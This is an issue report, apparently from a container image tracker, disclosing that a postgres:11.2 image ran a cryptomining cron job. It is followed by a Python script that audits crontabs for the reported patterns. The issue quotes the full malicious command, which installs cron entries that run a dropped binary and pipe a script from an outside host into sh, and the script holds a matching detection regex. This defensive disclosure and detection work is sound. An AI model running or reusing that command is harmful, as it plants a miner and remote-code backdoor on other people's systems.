Closed
Labels: question (Usability question, not directly related to an error with the image)
Description
Postgres 11.2 AMD64 image seems to be compromised and should be immediately removed from dockerhub. This image executes a cron job to mine cryptocurrencies, and possibly more. Might be worth auditing all variants in case.
cmd: echo "*/30 * * * * /var/lib/postgresql/data/./oka" > /tmp/a;echo "* */6 * * * wget -q -O- http://xmr.linux1213.ru:2019/back.sh | sh">> /tmp/a; crontab /tmp/a;rm -rf /tmp/a
We noticed on our host machine that there was a process running a suspicious script ./oka. This process was coming from a 2 day old postgres:11.2 docker container once we looked inside the container. We had to nuke the image and fs mounts, so nothing is left over, and rerunning locally I am not able to immediately see the same effect, could be the script only runs after a certain amount of time.
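
A check for the two cron patterns reported above, as an added example that is not part of the original issue or of the image's code. The function names, the list of writable directories and the placeholder hostname in the sample are assumptions.

```python
import re

# Heuristics drawn from the two cron entries reported in the issue.
FETCH_PIPE_SHELL = re.compile(r"\b(?:wget|curl)\b[^|;&]*\|\s*(?:ba|da|z)?sh\b")
# Directories that should hold data or scratch files, not scheduled programs (assumed list).
WRITABLE_DIRS = ("/var/lib/postgresql/data/", "/tmp/", "/var/tmp/", "/dev/shm/")
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")


def cron_command(line):
    """Return the command part of a user crontab line, or None for non-job lines."""
    line = line.strip()
    if not line or line.startswith("#") or ENV_LINE.match(line):
        return None
    shortcut = line.startswith("@")  # e.g. @reboot, @hourly
    parts = line.split(None, 1 if shortcut else 5)
    return parts[-1] if len(parts) == (2 if shortcut else 6) else None


def audit_crontab(text):
    """Return (line_number, reason, command) for each suspicious job in crontab text."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        command = cron_command(line)
        if command is None:
            continue
        if FETCH_PIPE_SHELL.search(command):
            findings.append((number, "remote script piped to a shell", command))
        if command.split()[0].startswith(WRITABLE_DIRS):
            findings.append((number, "executable in a data or temp directory", command))
    return findings


# Constructed sample: the two entries from the report (host replaced by a placeholder)
# plus one ordinary maintenance job.
SAMPLE = """\
# m h dom mon dow command
MAILTO=""
*/30 * * * * /var/lib/postgresql/data/./oka
* */6 * * * wget -q -O- http://miner.example.invalid:2019/back.sh | sh
0 3 * * * /usr/bin/pg_dump -U postgres appdb -f /backups/appdb.sql
"""

if __name__ == "__main__":
    for number, reason, command in audit_crontab(SAMPLE):
        print(f"line {number}: {reason}: {command}")
```

To audit a running container, pass the text printed by `crontab -l` inside it to `audit_crontab`.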